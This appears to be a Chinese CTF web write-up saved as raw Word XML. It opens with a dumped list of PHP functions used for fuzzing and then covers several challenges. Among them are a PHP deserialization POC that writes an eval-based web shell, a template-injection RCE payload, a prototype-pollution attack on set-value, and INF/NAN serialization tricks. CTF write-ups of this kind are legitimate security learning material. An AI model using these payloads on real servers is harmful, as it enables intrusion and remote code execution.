mysqli_stmt_field_count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[868] =&gt; mysqli_stmt_free_result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[869] =&gt; mysqli_stmt_get_warnings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[870] =&gt; mysqli_stmt_init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[871] =&gt; mysqli_stmt_insert_id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[872] =&gt; mysqli_stmt_num_rows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[873] =&gt; mysqli_stmt_param_count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[874] =&gt; mysqli_stmt_prepare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[875] =&gt; mysqli_stmt_reset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[876] =&gt; mysqli_stmt_result_metadata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[877] =&gt; mysqli_stmt_send_long_data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[878] =&gt; mysqli_stmt_store_result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[879] =&gt; mysqli_stmt_sqlstate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[880] =&gt; mysqli_sqlstate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[881] =&gt; mysqli_ssl_set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[882] =&gt; mysqli_stat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[883] =&gt; mysqli_store_result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[884] =&gt; mysqli_thread_id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[885] =&gt; mysqli_thread_safe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[886] =&gt; mysqli_use_result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[887] =&gt; mysqli_warning_count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[888] =&gt; mysqli_refresh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[889] =&gt; mysqli_escape_string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[890] =&gt; mysqli_set_opt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[891] =&gt; pcntl_fork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[892] =&gt; pcntl_waitpid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[893] =&gt; pcntl_wait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[894] =&gt; pcntl_signal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[895] =&gt; pcntl_signal_dispatch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[896] =&gt; pcntl_wifexited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[897] =&gt; pcntl_wifstopped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[898] =&gt; pcntl_wifsignaled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[899] =&gt; pcntl_wexitstatus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[900] =&gt; pcntl_wtermsig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[901] =&gt; pcntl_wstopsig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[902] =&gt; pcntl_exec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[903] =&gt; pcntl_alarm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[904] =&gt; pcntl_get_last_error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[905] =&gt; pcntl_errno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[906] =&gt; pcntl_strerror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[907] =&gt; pcntl_getpriority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[908] =&gt; pcntl_setpriority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[909] =&gt; pcntl_sigprocmask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[910] =&gt; pcntl_sigwaitinfo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[911] =&gt; pcntl_sigtimedwait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[912] =&gt; pcntl_wifcontinued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[913] =&gt; pdo_drivers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[914] =&gt; posix_kill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[915] =&gt; posix_getpid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[916] =&gt; posix_getppid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[917] =&gt; posix_getuid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[918] =&gt; posix_setuid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[919] =&gt; posix_geteuid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[920] =&gt; posix_seteuid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[921] =&gt; posix_getgid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[922] =&gt; posix_setgid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[923] =&gt; posix_getegid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[924] =&gt; posix_setegid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[925] =&gt; posix_getgroups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[926] =&gt; posix_getlogin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[927] =&gt; posix_getpgrp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[928] =&gt; posix_setsid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[929] =&gt; posix_setpgid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[930] =&gt; posix_getpgid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[931] =&gt; posix_getsid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[932] =&gt; posix_uname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[933] =&gt; posix_times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[934] =&gt; posix_ctermid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[935] =&gt; posix_ttyname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[936] =&gt; posix_isatty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[937] =&gt; posix_getcwd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[938] =&gt; posix_mkfifo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[939] =&gt; posix_mknod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[940] =&gt; posix_access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[941] =&gt; posix_getgrnam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[942] =&gt; posix_getgrgid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[943] =&gt; posix_getpwnam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[944] =&gt; posix_getpwuid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[945] =&gt; posix_getrlimit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[946] =&gt; posix_setrlimit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[947] =&gt; posix_get_last_error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[948] =&gt; posix_errno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[949] =&gt; posix_strerror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[950] =&gt; posix_initgroups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[951] =&gt; pspell_new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[952] =&gt; pspell_new_personal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[953] =&gt; pspell_new_config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[954] =&gt; pspell_check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[955] =&gt; pspell_suggest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[956] =&gt; pspell_store_replacement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[957] =&gt; pspell_add_to_personal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[958] =&gt; pspell_add_to_session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[959] =&gt; pspell_clear_session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[960] =&gt; pspell_save_wordlist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[961] =&gt; pspell_config_create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[962] =&gt; pspell_config_runtogether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[963] =&gt; pspell_config_mode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[964] =&gt; pspell_config_ignore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[965] =&gt; pspell_config_personal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[966] =&gt; pspell_config_dict_dir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[967] =&gt; pspell_config_data_dir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[968] =&gt; pspell_config_repl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[969] =&gt; pspell_config_save_repl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[970] =&gt; recode_string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[971] =&gt; recode_file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[972] =&gt; recode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[973] =&gt; session_name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[974] =&gt; session_module_name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[975] =&gt; session_save_path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[976] =&gt; session_id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[977] =&gt; session_regenerate_id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[978] =&gt; session_decode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[979] =&gt; session_encode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[980] =&gt; session_start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[981] =&gt; session_destroy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[982] =&gt; session_unset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[983] =&gt; session_set_save_handler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[984] =&gt; session_cache_limiter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[985] =&gt; session_cache_expire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[986] =&gt; session_set_cookie_params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[987] =&gt; session_get_cookie_params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[988] =&gt; session_write_close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[989] =&gt; session_abort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[990] =&gt; session_reset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[991] =&gt; session_status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[992] =&gt; session_register_shutdown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[993] =&gt; session_commit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[994] =&gt; simplexml_load_file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[995] =&gt; simplexml_load_string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[996] =&gt; simplexml_import_dom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[997] =&gt; use_soap_error_handler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[998] =&gt; is_soap_fault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[999] =&gt; spl_classes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[1000] =&gt; spl_autoload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[1001] =&gt; spl_autoload_extensions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[1002] =&gt; spl_autoload_register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[1003] =&gt; spl_autoload_unregister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[1004] =&gt; spl_autoload_functions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[1005] =&gt; spl_autoload_call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[1006] =&gt; class_parents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[1007] =&gt; class_implements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[1008] =&gt; class_uses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[1009] =&gt; spl_object_hash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[1010] =&gt; iterator_to_array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[1011] =&gt; iterator_count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[1012] =&gt; iterator_apply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[1013] =&gt; constant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[1014] =&gt; bin2hex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[1015] =&gt; hex2bin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[1016] =&gt; sleep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[1017] =&gt; usleep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[1018] =&gt; time_nanosleep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[1019] =&gt; time_sleep_until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[1020] =&gt; strptime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[1021] =&gt; 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[1022] =&gt; wordwrap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[1023] =&gt; htmlspecialchars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[1024] =&gt; htmlentities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[1025] =&gt; html_entity_decode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[1026] =&gt; htmlspecialchars_decode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[1027] =&gt; get_html_translation_table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[1028] =&gt; sha1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[1029] =&gt; sha1_file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[1030] =&gt; md5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[1031] =&gt; md5_file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[1032] =&gt; crc32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[1033] =&gt; iptcparse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[1034] =&gt; iptcembed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[1035] =&gt; getimagesize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[1036] =&gt; getimagesizefromstring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[1037] =&gt; image_type_to_mime_type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[1038] =&gt; image_type_to_extension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[1039] =&gt; phpinfo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[1040] =&gt; phpversion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[1041] =&gt; phpcredits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[1042] =&gt; php_sapi_name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[1043] =&gt; php_uname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[1044] =&gt; php_ini_scanned_files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[1045] =&gt; php_ini_loaded_file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[1046] =&gt; strnatcmp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[1047] =&gt; strnatcasecmp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[1048] =&gt; substr_count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[1049] =&gt; strspn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[1050] =&gt; strcspn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[1051] =&gt; strtok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[1052] =&gt; strtoupper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[1053] =&gt; strtolower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[1054] =&gt; strpos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[1055] =&gt; stripos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[1056] =&gt; strrpos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[1057] =&gt; strripos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[1058] =&gt; strrev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[1059] =&gt; hebrev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[1060] =&gt; hebrevc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[1061] =&gt; nl2br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[1062] =&gt; basename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[1063] =&gt; dirname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[1064] =&gt; pathinfo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[1065] =&gt; stripslashes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[1066] =&gt; stripcslashes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[1067] =&gt; strstr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[1068] =&gt; stristr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[1069] =&gt; strrchr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[1070] =&gt; str_shuffle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[1071] =&gt; str_word_count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[1072] =&gt; str_split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[1073] =&gt; strpbrk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[1074] =&gt; substr_compare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[1075] =&gt; strcoll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[1076] =&gt; money_format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[1077] =&gt; substr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[1078] =&gt; substr_replace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[1079] =&gt; quotemeta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[1080] =&gt; ucfirst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[1081] =&gt; lcfirst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[1082] =&gt; ucwords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[1083] =&gt; strtr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[1084] =&gt; addslashes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[1085] =&gt; addcslashes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[1086] =&gt; rtrim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[1087] =&gt; str_replace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[1088] =&gt; str_ireplace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[1089] =&gt; str_repeat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[1090] =&gt; count_chars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[1091] =&gt; chunk_split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[1092] =&gt; trim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[1093] =&gt; ltrim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[1094] =&gt; strip_tags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[1095] =&gt; similar_text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[1096] =&gt; explode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[1097] =&gt; implode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[1098] =&gt; join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[1099] =&gt; setlocale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[1100] =&gt; localeconv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[1101] =&gt; nl_langinfo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[1102] =&gt; soundex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[1103] =&gt; levenshtein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[1104] =&gt; chr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[1105] =&gt; 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[1106] =&gt; parse_str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[1107] =&gt; str_getcsv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[1108] =&gt; str_pad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[1109] =&gt; chop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[1110] =&gt; strchr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[1111] =&gt; sprintf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[1112] =&gt; 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[1113] =&gt; vprintf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[1114] =&gt; vsprintf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[1115] =&gt; fprintf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[1116] =&gt; vfprintf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[1117] =&gt; sscanf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[1118] =&gt; fscanf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[1119] =&gt; parse_url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[1120] =&gt; urlencode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[1121] =&gt; urldecode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[1122] =&gt; rawurlencode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[1123] =&gt; rawurldecode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[1124] =&gt; http_build_query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[1125] =&gt; readlink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[1126] =&gt; linkinfo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[1127] =&gt; symlink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[1128] =&gt; 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[1129] =&gt; unlink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[1130] =&gt; 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[1131] =&gt;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[1132] =&gt; escapeshellcmd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[1133] =&gt; escapeshellarg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[1134] =&gt; passthru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[1135] =&gt; shell_exec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[1136] =&gt; proc_open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[1137] =&gt; proc_close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[1138] =&gt; proc_terminate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[1139] =&gt; proc_get_status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[1140] =&gt; proc_nice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[1141] =&gt; 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[1142] =&gt; srand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[1143] =&gt; getrandmax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[1144] =&gt; mt_rand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[1145] =&gt; mt_srand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[1146] =&gt; mt_getrandmax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[1147] =&gt; random_bytes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[1148] =&gt; random_int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[1149] =&gt; getservbyname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[1150] =&gt; getservbyport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[1151] =&gt; getprotobyname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[1152] =&gt; getprotobynumber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[1153] =&gt; getmyuid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[1154] =&gt; getmygid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[1155] =&gt; getmypid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[1156] =&gt; getmyinode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[1157] =&gt; getlastmod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[1158] =&gt; base64_decode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[1159] =&gt; base64_encode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[1160] =&gt; password_hash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[1161] =&gt; password_get_info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[1162] =&gt; password_needs_rehash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[1163] =&gt; password_verify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[1164] =&gt; convert_uuencode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[1165] =&gt; convert_uudecode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[1166] =&gt; abs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[1167] =&gt; ceil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[1168] =&gt; floor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[1169] =&gt; round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[1170] =&gt; sin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[1171] =&gt; cos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[1172] =&gt; tan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[1173] =&gt; asin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[1174] =&gt; acos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[1175] =&gt; atan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[1176] =&gt; atanh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[1177] =&gt; atan2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[1178] =&gt; sinh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[1179] =&gt; cosh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[1180] =&gt; tanh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[1181] =&gt; asinh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[1182] =&gt; acosh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[1183] =&gt; expm1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[1184] =&gt; log1p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[1185] =&gt; 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[1186] =&gt; is_finite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[1187] =&gt; is_nan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[1188] =&gt; is_infinite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[1189] =&gt; pow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[1190] =&gt; exp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[1191] =&gt;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[1192] =&gt; log10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[1193] =&gt; sqrt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[1194] =&gt; hypot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[1195] =&gt; deg2rad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[1196] =&gt; rad2deg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[1197] =&gt; bindec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[1198] =&gt; hexdec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[1199] =&gt; octdec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[1200] =&gt; decbin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[1201] =&gt; decoct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[1202] =&gt; dechex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[1203] =&gt; base_convert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[1204] =&gt; number_format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[1205] =&gt; fmod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[1206] =&gt; intdiv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[1207] =&gt; inet_ntop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[1208] =&gt; inet_pton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[1209] =&gt; ip2long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[1210] =&gt; long2ip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[1211] =&gt; getenv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[1212] =&gt; putenv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[1213] =&gt; getopt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[1214] =&gt; sys_getloadavg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[1215] =&gt; microtime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[1216] =&gt; gettimeofday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[1217] =&gt; getrusage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[1218] =&gt; uniqid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[1219] =&gt; quoted_printable_decode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[1220] =&gt; quoted_printable_encode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[1221] =&gt; convert_cyr_string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[1222] =&gt; get_current_user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[1223] =&gt; set_time_limit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[1224] =&gt; header_register_callback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[1225] =&gt; get_cfg_var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[1226] =&gt; get_magic_quotes_gpc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[1227] =&gt; get_magic_quotes_runtime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[1228] =&gt; error_log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[1229] =&gt; error_get_last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[1230] =&gt; error_clear_last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[1231] =&gt; call_user_func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[1232] =&gt; call_user_func_array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[1233] =&gt; forward_static_call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[1234] =&gt; forward_static_call_array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[1235] =&gt; serialize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[1236] =&gt; unserialize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[1237] =&gt; var_dump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[1238] =&gt; var_export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[1239] =&gt; debug_zval_dump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[1240] =&gt; print_r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[1241] =&gt; memory_get_usage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[1242] =&gt; memory_get_peak_usage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[1243] =&gt; register_shutdown_function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[1244] =&gt; register_tick_function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[1245] =&gt; unregister_tick_function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[1246] =&gt; highlight_file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[1247] =&gt; show_source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[1248] =&gt; highlight_string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[1249] =&gt; php_strip_whitespace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[1250] =&gt; ini_get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[1251] =&gt; ini_get_all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[1252] =&gt; ini_set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[1253] =&gt; ini_alter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[1254] =&gt; ini_restore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[1255] =&gt; get_include_path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[1256] =&gt; set_include_path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[1257] =&gt; restore_include_path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[1258] =&gt; setcookie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[1259] =&gt; setrawcookie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[1260] =&gt; header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[1261] =&gt; header_remove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[1262] =&gt; headers_sent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[1263] =&gt; headers_list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[1264] =&gt; http_response_code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[1265] =&gt; connection_aborted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[1266] =&gt; connection_status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[1267] =&gt; ignore_user_abort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[1268] =&gt; parse_ini_file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[1269] =&gt; parse_ini_string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[1270] =&gt; is_uploaded_file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[1271] =&gt; move_uploaded_file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[1272] =&gt; gethostbyaddr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[1273] =&gt; gethostbyname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[1274] =&gt; gethostbynamel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[1275] =&gt; gethostname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[1276] =&gt; dns_check_record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[1277] =&gt; checkdnsrr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[1278] =&gt; dns_get_mx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[1279] =&gt; getmxrr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[1280] =&gt; dns_get_record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[1281] =&gt; intval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[1282] =&gt; floatval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[1283] =&gt; doubleval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[1284] =&gt; strval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[1285] =&gt; boolval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[1286] =&gt; gettype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[1287] =&gt; settype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[1288] =&gt; is_null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[1289] =&gt; is_resource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[1290] =&gt; is_bool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[1291] =&gt; is_int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[1292] =&gt; is_float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[1293] =&gt; is_integer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[1294] =&gt; is_long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[1295] =&gt; is_double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[1296] =&gt; is_real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[1297] =&gt; is_numeric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[1298] =&gt; is_string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[1299] =&gt; is_array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[1300] =&gt; is_object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[1301] =&gt; is_scalar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[1302] =&gt; is_callable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[1303] =&gt; pclose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[1304] =&gt; popen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[1305] =&gt; readfile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[1306] =&gt; rewind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[1307] =&gt; rmdir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[1308] =&gt; umask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[1309] =&gt; fclose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[1310] =&gt; feof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[1311] =&gt; fgetc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[1312] =&gt; fgets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[1313] =&gt; fgetss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[1314] =&gt; fread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[1315] =&gt; fopen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[1316] =&gt; fpassthru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[1317] =&gt; ftruncate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[1318] =&gt; fstat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[1319] =&gt; fseek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[1320] =&gt; ftell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[1321] =&gt; fflush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[1322] =&gt; fwrite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[1323] =&gt; fputs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[1324] =&gt;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[1325] =&gt; rename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[1326] =&gt; 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[1327] =&gt; tempnam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[1328] =&gt; tmpfile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[1329] =&gt; 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[1330] =&gt; file_get_contents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[1331] =&gt; file_put_contents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[1332] =&gt; stream_select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[1333] =&gt; stream_context_create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[1334] =&gt; stream_context_set_params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[1335] =&gt; stream_context_get_params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[1336] =&gt; stream_context_set_option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[1337] =&gt; stream_context_get_options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[1338] =&gt; stream_context_get_default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[1339] =&gt; stream_context_set_default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[1340] =&gt; stream_filter_prepend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[1341] =&gt; stream_filter_append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[1342] =&gt; stream_filter_remove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[1343] =&gt; stream_socket_client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[1344] =&gt; stream_socket_server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[1345] =&gt; stream_socket_accept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[1346] =&gt; stream_socket_get_name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[1347] =&gt; stream_socket_recvfrom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[1348] =&gt; stream_socket_sendto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[1349] =&gt; stream_socket_enable_crypto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[1350] =&gt; stream_socket_shutdown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[1351] =&gt; stream_socket_pair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[1352] =&gt; stream_copy_to_stream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[1353] =&gt; stream_get_contents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[1354] =&gt; stream_supports_lock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[1355] =&gt; fgetcsv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[1356] =&gt; fputcsv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[1357] =&gt; flock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[1358] =&gt; get_meta_tags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[1359] =&gt; stream_set_read_buffer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[1360] =&gt; stream_set_write_buffer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[1361] =&gt; set_file_buffer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[1362] =&gt; stream_set_chunk_size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[1363] =&gt; stream_set_blocking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[1364] =&gt; socket_set_blocking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[1365] =&gt; stream_get_meta_data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[1366] =&gt; stream_get_line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[1367] =&gt; stream_wrapper_register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[1368] =&gt; stream_register_wrapper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[1369] =&gt; stream_wrapper_unregister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[1370] =&gt; stream_wrapper_restore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[1371] =&gt; stream_get_wrappers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[1372] =&gt; stream_get_transports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[1373] =&gt; stream_resolve_include_path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[1374] =&gt; stream_is_local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[1375] =&gt; get_headers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[1376] =&gt; stream_set_timeout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[1377] =&gt; socket_set_timeout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[1378] =&gt; socket_get_status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[1379] =&gt; realpath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[1380] =&gt; fnmatch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[1381] =&gt; fsockopen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[1382] =&gt; pfsockopen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[1383] =&gt; pack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[1384] =&gt; unpack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[1385] =&gt; get_browser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[1386] =&gt; crypt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[1387] =&gt; opendir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[1388] =&gt; closedir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[1389] =&gt; chdir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[1390] =&gt; getcwd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[1391] =&gt; rewinddir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[1392] =&gt; readdir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[1393] =&gt; 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[1394] =&gt; scandir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[1395] =&gt; glob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[1396] =&gt; fileatime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[1397] =&gt; filectime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[1398] =&gt; filegroup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[1399] =&gt; fileinode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[1400] =&gt; filemtime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[1401] =&gt; fileowner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[1402] =&gt; fileperms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[1403] =&gt; filesize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[1404] =&gt; filetype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[1405] =&gt; file_exists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[1406] =&gt; is_writable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[1407] =&gt; is_writeable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[1408] =&gt; is_readable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[1409] =&gt; is_executable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[1410] =&gt; is_file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[1411] =&gt; is_dir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[1412] =&gt; is_link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[1413] =&gt; stat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[1414] =&gt; lstat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[1415] =&gt; chown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[1416] =&gt; chgrp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[1417] =&gt; lchown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[1418] =&gt; lchgrp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[1419] =&gt; chmod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[1420] =&gt; touch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[1421] =&gt; clearstatcache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[1422] =&gt; disk_total_space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[1423] =&gt; disk_free_space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[1424] =&gt; diskfreespace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[1425] =&gt; realpath_cache_size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[1426] =&gt; realpath_cache_get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[1427] =&gt; mail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[1428] =&gt; ezmlm_hash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[1429] =&gt; openlog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[1430] =&gt; syslog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[1431] =&gt; closelog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[1432] =&gt; lcg_value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[1433] =&gt; metaphone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[1434] =&gt; ob_start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[1435] =&gt; ob_flush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[1436] =&gt; ob_clean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[1437] =&gt; ob_end_flush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[1438] =&gt; ob_end_clean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[1439] =&gt; ob_get_flush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[1440] =&gt; ob_get_clean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[1441] =&gt; ob_get_length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[1442] =&gt; ob_get_level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[1443] =&gt; ob_get_status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[1444] =&gt; ob_get_contents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[1445] =&gt; ob_implicit_flush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[1446] =&gt; ob_list_handlers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[1447] =&gt; ksort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[1448] =&gt; krsort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[1449] =&gt; natsort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[1450] =&gt; natcasesort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[1451] =&gt; asort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[1452] =&gt; arsort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[1453] =&gt; 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[1454] =&gt; rsort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[1455] =&gt; usort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[1456] =&gt; uasort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[1457] =&gt; uksort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[1458] =&gt; shuffle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[1459] =&gt; array_walk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[1460] =&gt; array_walk_recursive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[1461] =&gt; count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[1462] =&gt;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[1463] =&gt; prev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[1464] =&gt; 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[1465] =&gt; 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[1466] =&gt; current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[1467] =&gt; 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[1468] =&gt; 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[1469] =&gt; max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[1470] =&gt; in_array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[1471] =&gt; array_search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[1472] =&gt; extract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[1473] =&gt; compact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[1474] =&gt; array_fill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[1475] =&gt; array_fill_keys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[1476] =&gt; range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[1477] =&gt; array_multisort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[1478] =&gt; array_push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[1479] =&gt; array_pop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[1480] =&gt; array_shift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[1481] =&gt; array_unshift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[1482] =&gt; array_splice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[1483] =&gt; array_slice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[1484] =&gt; array_merge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[1485] =&gt; array_merge_recursive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[1486] =&gt; array_replace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[1487] =&gt; array_replace_recursive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[1488] =&gt; array_keys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[1489] =&gt; array_values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[1490] =&gt; array_count_values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[1491] =&gt; array_column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[1492] =&gt; array_reverse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[1493] =&gt; array_reduce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[1494] =&gt; array_pad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[1495] =&gt; array_flip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[1496] =&gt; array_change_key_case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[1497] =&gt; array_rand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[1498] =&gt; array_unique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[1499] =&gt; array_intersect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[1500] =&gt; array_intersect_key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[1501] =&gt; array_intersect_ukey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[1502] =&gt; array_uintersect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[1503] =&gt; array_intersect_assoc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[1504] =&gt; array_uintersect_assoc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[1505] =&gt; array_intersect_uassoc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[1506] =&gt; array_uintersect_uassoc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[1507] =&gt; array_diff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[1508] =&gt; array_diff_key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[1509] =&gt; array_diff_ukey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[1510] =&gt; array_udiff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[1511] =&gt; array_diff_assoc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[1512] =&gt; array_udiff_assoc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[1513] =&gt; array_diff_uassoc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[1514] =&gt; array_udiff_uassoc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[1515] =&gt; array_sum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[1516] =&gt; array_product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[1517] =&gt; array_filter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[1518] =&gt; array_map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[1519] =&gt; array_chunk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[1520] =&gt; array_combine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[1521] =&gt; array_key_exists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[1522] =&gt; pos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[1523] =&gt; sizeof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[1524] =&gt; key_exists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[1525] =&gt; assert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[1526] =&gt; assert_options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[1527] =&gt; version_compare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[1528] =&gt; ftok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[1529] =&gt; str_rot13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[1530] =&gt; stream_get_filters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[1531] =&gt; stream_filter_register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[1532] =&gt; stream_bucket_make_writeable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[1533] =&gt; stream_bucket_prepend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[1534] =&gt; stream_bucket_append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[1535] =&gt; stream_bucket_new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[1536] =&gt; output_add_rewrite_var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[1537] =&gt; output_reset_rewrite_vars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[1538] =&gt; sys_get_temp_dir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[1539] =&gt; msg_get_queue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[1540] =&gt; msg_send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[1541] =&gt; msg_receive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[1542] =&gt; msg_remove_queue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[1543] =&gt; msg_stat_queue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[1544] =&gt; msg_set_queue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[1545] =&gt; msg_queue_exists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[1546] =&gt; sem_get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[1547] =&gt; sem_acquire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[1548] =&gt; sem_release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[1549] =&gt; sem_remove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[1550] =&gt; shm_attach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[1551] =&gt; shm_remove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[1552] =&gt; shm_detach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[1553] =&gt; shm_put_var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[1554] =&gt; shm_has_var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[1555] =&gt; shm_get_var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[1556] =&gt; shm_remove_var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[1557] =&gt; token_get_all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[1558] =&gt; token_name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[1559] =&gt; wddx_serialize_value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[1560] =&gt; wddx_serialize_vars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[1561] =&gt; wddx_packet_start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[1562] =&gt; wddx_packet_end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[1563] =&gt; wddx_add_vars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[1564] =&gt; wddx_deserialize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[1565] =&gt; xml_parser_create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[1566] =&gt; xml_parser_create_ns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[1567] =&gt; xml_set_object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[1568] =&gt; xml_set_element_handler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[1569] =&gt; xml_set_character_data_handler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[1570] =&gt; xml_set_processing_instruction_handler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[1571] =&gt; xml_set_default_handler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[1572] =&gt; xml_set_unparsed_entity_decl_handler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[1573] =&gt; xml_set_notation_decl_handler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[1574] =&gt; xml_set_external_entity_ref_handler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[1575] =&gt; xml_set_start_namespace_decl_handler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[1576] =&gt; xml_set_end_namespace_decl_handler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[1577] =&gt; xml_parse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[1578] =&gt; xml_parse_into_struct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[1579] =&gt; xml_get_error_code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[1580] =&gt; xml_error_string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[1581] =&gt; xml_get_current_line_number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[1582] =&gt; xml_get_current_column_number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[1583] =&gt; xml_get_current_byte_index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[1584] =&gt; xml_parser_free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[1585] =&gt; xml_parser_set_option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[1586] =&gt; xml_parser_get_option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[1587] =&gt; utf8_encode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[1588] =&gt; utf8_decode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[1589] =&gt; xmlwriter_open_uri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[1590] =&gt; xmlwriter_open_memory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[1591] =&gt; xmlwriter_set_indent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[1592] =&gt; xmlwriter_set_indent_string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[1593] =&gt; xmlwriter_start_comment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[1594] =&gt; xmlwriter_end_comment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[1595] =&gt; xmlwriter_start_attribute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[1596] =&gt; xmlwriter_end_attribute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[1597] =&gt; xmlwriter_write_attribute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[1598] =&gt; xmlwriter_start_attribute_ns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[1599] =&gt; xmlwriter_write_attribute_ns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[1600] =&gt; xmlwriter_start_element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[1601] =&gt; xmlwriter_end_element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[1602] =&gt; xmlwriter_full_end_element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[1603] =&gt; xmlwriter_start_element_ns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[1604] =&gt; xmlwriter_write_element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[1605] =&gt; xmlwriter_write_element_ns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[1606] =&gt; xmlwriter_start_pi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[1607] =&gt; xmlwriter_end_pi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[1608] =&gt; xmlwriter_write_pi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[1609] =&gt; xmlwriter_start_cdata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[1610] =&gt; xmlwriter_end_cdata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[1611] =&gt; xmlwriter_write_cdata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[1612] =&gt; xmlwriter_text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[1613] =&gt; xmlwriter_write_raw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[1614] =&gt; xmlwriter_start_document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[1615] =&gt; xmlwriter_end_document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[1616] =&gt; xmlwriter_write_comment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[1617] =&gt; xmlwriter_start_dtd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[1618] =&gt; xmlwriter_end_dtd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[1619] =&gt; xmlwriter_write_dtd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[1620] =&gt; xmlwriter_start_dtd_element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[1621] =&gt; xmlwriter_end_dtd_element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[1622] =&gt; xmlwriter_write_dtd_element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[1623] =&gt; xmlwriter_start_dtd_attlist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[1624] =&gt; xmlwriter_end_dtd_attlist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[1625] =&gt; xmlwriter_write_dtd_attlist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[1626] =&gt; xmlwriter_start_dtd_entity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[1627] =&gt; xmlwriter_end_dtd_entity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[1628] =&gt; xmlwriter_write_dtd_entity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[1629] =&gt; xmlwriter_output_memory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[1630] =&gt; xmlwriter_flush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[1631] =&gt; zip_open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[1632] =&gt; zip_close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[1633] =&gt; zip_read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[1634] =&gt; zip_entry_open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[1635] =&gt; zip_entry_close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[1636] =&gt; zip_entry_read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[1637] =&gt; zip_entry_filesize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[1638] =&gt; zip_entry_name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[1639] =&gt; zip_entry_compressedsize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[1640] =&gt; zip_entry_compressionmethod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[1641] =&gt; dl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[1642] =&gt; cli_set_process_title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[1643] =&gt; cli_get_process_title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t=re.findall("\[.*?\] =&gt; (.*?)\n",s,re.S)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f=open("function.txt","w")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x in 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f.write(x+"\n")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f.close()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进行poc的设置，导入字典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279525"/>
            <wp:effectExtent l="0" t="0" r="635" b="63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然后爆破，发现有很多函数都可以触发，这样就得到了flag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4169410"/>
            <wp:effectExtent l="0" t="0" r="4445" b="635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19 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>babyunserialize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val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扫目录得到备份文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="51739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找链子，发现可以文件写入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="291973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构造poc：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 DB{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Jig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$data=['shell.php'=&gt;['&lt;?php eval($_GET[1]);?&gt;']],$dir="./",$lazy=1;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$a= new DB\Jig;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urlencode(serialize($a));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蚁剑连上</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="283019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Uafbypass绕过函数禁用：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="4039235"/>
            <wp:effectExtent l="0" t="0" r="19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 rceme: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首先他会对字符串进行正则匹配，简单的审计就绕过了，而且没有过滤引号，这个就非常好说了，通过 . 进行字符串拼接，先试了试phpinfo，发现直接得到flag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Poc：a={if:1)(%27ph%27.%27pinfo%27)();//}{end%20if}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="2247900"/>
            <wp:effectExtent l="0" t="0" r="317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21 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>littlegame</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>: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发现得到flag需要key和对应的password正确</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="3415030"/>
            <wp:effectExtent l="0" t="0" r="127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这里可以先生成用户session.knight，然后发现了setFn，看看这个函数干了什么</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="3152140"/>
            <wp:effectExtent l="0" t="0" r="254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发现是set-value里面的，版本是3.0.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2112010"/>
            <wp:effectExtent l="0" t="0" r="7620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查到相关漏洞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"https://snyk.io/vuln/SNYK-JS-SETVALUE-450213"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https://snyk.io/vuln/SNYK-JS-SETVALUE-450213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3675" cy="2731135"/>
            <wp:effectExtent l="0" t="0" r="14605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直接利用进行原型链污染，污染a0为true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="2860675"/>
            <wp:effectExtent l="0" t="0" r="444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访问得到flag的路由key为a0，password为true，得到flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="2640330"/>
            <wp:effectExtent l="0" t="0" r="2540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22 easytrick：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就是php的数字和字符串的小技巧，INF和NAN他们属于数字，md5处理他们的时候会转为字符串即为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NAN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69230" cy="1483995"/>
            <wp:effectExtent l="0" t="0" r="381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构造poc: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trick{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$trick1;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$trick2;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 = new trick;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$a-&gt;trick1="INF";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$a-&gt;trick2=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>INF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serialize($a);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O:5:"trick":2:{s:6:"trick1";s:3:"INF";s:6:"trick2";d:INF;}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3122295"/>
            <wp:effectExtent l="0" t="0" r="444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改成NAN也行: trick=O:5:"trick":2:{s:6:"trick1";s:3:"NAN";s:6:"trick2";d:NAN;}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95600"/>
            <wp:effectExtent l="0" t="0" r="381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C3494"/>
    <w:rsid w:val="085F1B31"/>
